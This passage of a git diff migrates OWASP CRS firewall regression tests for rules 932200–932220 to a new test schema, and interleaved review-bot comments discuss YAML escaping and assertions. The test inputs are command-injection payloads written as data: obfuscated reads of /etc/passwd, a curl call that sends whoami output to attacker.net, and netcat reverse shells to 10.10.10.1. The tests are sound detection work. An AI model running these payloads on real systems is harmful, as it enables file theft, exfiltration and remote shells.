log_contains: id "932200" - - test_title: 932200-11 + - input: + dest_addr: 127.0.0.1 + 
headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 11 desc: "Test first backslash match ([*?`\\'][^/\n]+/) with: c\at /etc/passwd" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 12 desc: "Test second backslash match (/[^/]+?[*?`\\']) with: cat /etc/p\asswd" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" + version: HTTP/1.0 + output: + 
log: + expect_ids: [932200] + - test_id: 13 desc: "Test correct logging" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" - version: HTTP/1.0 - output: - no_log_contains: found within MATCHED_VAR - - test_title: 932200-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" + version: HTTP/1.0 + output: + log: + match_regex: 'found within ARGS:host:' + - test_id: 14 desc: "Test variable assignment ('cat /etc/passwd' assigned via individual variables, cat in reverse order)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: exec=c4%3D%5C%20%3Bc3%3Dt%3Bc2%3Da%3Bc1%3Dc%3Ba1%3D%2F%3Ba2%3De%3Ba3%3Dt%3Ba4%3Dc%3Ba5%3D%2F%3Ba6%3Dp%3Ba7%3Da%3Ba8%3Ds%3Ba9%3Ds%3Ba10%3Dw%3Ba11%3Dd%3B%24c1%24c2%24c3%24c4%24a1%24a2%24a3%24a4%24a5%24a6%24a7%24a8%24a9%24a10%24a11%0A - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-15 + - input: + dest_addr: 127.0.0.1 + data: exec=c4%3D%5C%20%3Bc3%3Dt%3Bc2%3Da%3Bc1%3Dc%3Ba1%3D%2F%3Ba2%3De%3Ba3%3Dt%3Ba4%3Dc%3Ba5%3D%2F%3Ba6%3Dp%3Ba7%3Da%3Ba8%3Ds%3Ba9%3Ds%3Ba10%3Dw%3Ba11%3Dd%3B%24c1%24c2%24c3%24c4%24a1%24a2%24a3%24a4%24a5%24a6%24a7%24a8%24a9%24a10%24a11%0A + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: 
"OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 15 desc: "Add test to match BB EBIDJ91T" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-16 + - input: + dest_addr: 127.0.0.1 + data: cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] + - test_id: 16 desc: "Add test to match BB MKXQCJMX" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: cmd=a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" + - input: + dest_addr: 127.0.0.1 + data: cmd=a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [932200] 
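Review bot: The `desc` strings of test 11 and test 12 are double-quoted, so `c\at` and `p\asswd` contain the YAML escape `\a` (BEL, U+0007) and `[^/\n]` contains a real newline rather than the literal backslash sequences the descriptions are meant to illustrate; these are unchanged context lines, so the commit does not address it. Doubling the backslashes fixes it: `c\\at`, `p\\asswd` and `[^/\\n]`, leaving the rest of each description as is. Separately, test 13 replaces the negative `no_log_contains: found within MATCHED_VAR` with the positive `match_regex: 'found within ARGS:host:'`, which no longer ties the assertion to this rule firing; if the go-ftw 1.0 `log` schema allows several fields side by side, adding `expect_ids: [932200]` next to the `match_regex` would pin that as well, which is worth confirming against the schema.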
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml index e79b47c6e..1fd9e4408 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml 
@@ -2,125 +2,124 @@ meta: author: "Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932205.yaml +rule_id: 932205 tests: - - test_title: 932205-1 + - test_id: 1 desc: Referer without query string, trying to evade query string match stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com;c$?at+/etc/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com;c$?at+/etc/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932205] + - test_id: 2 desc: Referer header with query string and obvious payload stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com?param=;/bin/ca?+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com?param=;/bin/ca?+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932205] + - test_id: 3 desc: Referer header with canonical path, query string and obvious payload stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932205] + - test_id: 4 desc: False positive test against query string and space in a parameter stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page?param=test+test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page?param=test+test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932205] + - test_id: 5 desc: False positive test against query string and space in path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page%20test?param=test" - method: GET - port: 80 - uri: "/get" 
- version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page%20test?param=test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932205] + - test_id: 6 desc: False positive test against syntax highlighter (generic) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "https://coreruleset.org/#:~:text=generic%20attack%20detection" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "https://coreruleset.org/#:~:text=generic%20attack%20detection" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932205] + - test_id: 7 desc: False positive test against fragment (scroll to text fragment) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "https://www.google.com/url?q=https://example.com/path/#:~:text=Inoltre%2C%20non%20vi%20sono%20evidenze,'immaginario%20comune%20(1).&sa=U&ved=2ahUKEwjSluGs8eX9AhWiSvEDHaaEChEQFnoECAgQBQ&usg=AOvVaw1_nmpM50Zh9-mGx1DsMw7j" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" 
+ - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "https://www.google.com/url?q=https://example.com/path/#:~:text=Inoltre%2C%20non%20vi%20sono%20evidenze,'immaginario%20comune%20(1).&sa=U&ved=2ahUKEwjSluGs8eX9AhWiSvEDHaaEChEQFnoECAgQBQ&usg=AOvVaw1_nmpM50Zh9-mGx1DsMw7j" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932205] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml index d795b05f2..3cfb335e8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml 
@@ -2,57 +2,56 @@ meta: author: "Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932206.yaml +rule_id: 932206 tests: - - test_title: 932206-1 + - test_id: 1 desc: Referer header without URL stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "/bin/ca't'+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932206" - - test_title: 932206-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "/bin/ca't'+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932206] + - test_id: 2 desc: False positive test against URL stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page?param=test+test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932206" - - test_title: 932206-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page?param=test+test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932206] + - test_id: 3 desc: False positive test against query string and space in path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page%20test?param=test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932206" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page%20test?param=test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932206] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml index 386492d8b..ff3a3d8b1 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml 
@@ -2,122 +2,121 @@ meta: author: "flo405, Franziska Bühler, azurit" description: SQLite System Command Execution - enabled: true - name: 932210.yaml +rule_id: 932210 tests: - - test_title: 932210-1 + - test_id: 1 desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 2 desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 3 desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 4 desc: ";\n.databases" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.databases" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.databases" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 5 desc: "Fix N9FKP2XQ: .sh whoami" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/juiceshop?s=1;.sh+whoami" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/juiceshop?s=1;.sh+whoami" + version: HTTP/1.0 + output: + log: + expect_ids: [932210] + - test_id: 6 desc: "N9FKP2XQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - code=1;.\"shell whoami - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932210" - - test_title: 932210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + code=1;.\"shell whoami + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932210] + - test_id: 7 desc: "N9FKP2XQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - code=1;.\'shell whoami - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932210" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + code=1;.\'shell whoami + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932210] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml index c0a81d84e..f5e8edbcf 100644 
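Review bot: Tests 6 and 7 keep `desc: "N9FKP2XQ"`, a bare finding reference that does not say what either case exercises, while test 5 at least names its payload; the two bodies differ only in the escaped quote before `shell`, so I'd use `desc: "N9FKP2XQ: escaped double quote before shell"` and `desc: "N9FKP2XQ: escaped single quote before shell"`. The `version:` value is quoted in tests 6–7 (`"HTTP/1.1"`) but plain in tests 1–5 (`HTTP/1.0`); both parse as strings, so one form should be used throughout. The two POST cases set no `Content-Type` header, so body parsing presumably relies on the runner's default form-urlencoded handling — worth adding `Content-Type: application/x-www-form-urlencoded` explicitly, as the 932230 tests in this same change do, so the match does not depend on runner defaults (confirm against the rule's target list, which is not in this diff).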
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml
@@ -2,255 +2,254 @@ meta: author: "Max Leske, Xhoenix, azurit" description: Unix shell RCE using pipe for less than 4 chars - enabled: true - name: 932220.yaml +rule_id: 932220 tests: - - test_title: 932220-1 + - test_id: 1 desc: "TEST=echo | php7.4" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | php7.4" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "TEST=echo | php7.4" + version: HTTP/1.0 + output: + log: + expect_ids: [932220] + - test_id: 2 desc: "TEST=echo | ${php7.4}php7.4" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | ${php7.4}php7.4" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "TEST=echo | ${php7.4}php7.4" + version: HTTP/1.0 + output: + log: + expect_ids: [932220] + - test_id: 3 desc: "whxami|sh+``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "whxami|sh+``" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "whxami|sh+``" + version: HTTP/1.0 + output: + log: + expect_ids: [932220] + - test_id: 4 desc: "whxami|fish+``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "whxami|fish+``" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "whxami|fish+``" + version: HTTP/1.0 + output: + log: + expect_ids: [932220] + - test_id: 5 desc: "Negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "echo | curx" - version: HTTP/1.0 - output: - no_log_contains: id "932220" - - test_title: 932220-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "echo | curx" + version: HTTP/1.0 + output: + log: 
+ no_expect_ids: [932220] + - test_id: 6 desc: | Test for BB finding 9P5LL13Y echo "foo;whxam"i | tr x o | sh #" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - uri: "/post" - port: 80 - data: | - echo "foo;whxam"i | tr x o | sh #" - version: HTTP/1.1 - output: - log_contains: id "932220" - - test_title: 932220-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + uri: "/post" + port: 80 + data: | + echo "foo;whxam"i | tr x o | sh #" + version: HTTP/1.1 + output: + log: + expect_ids: [932220] + - test_id: 7 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: 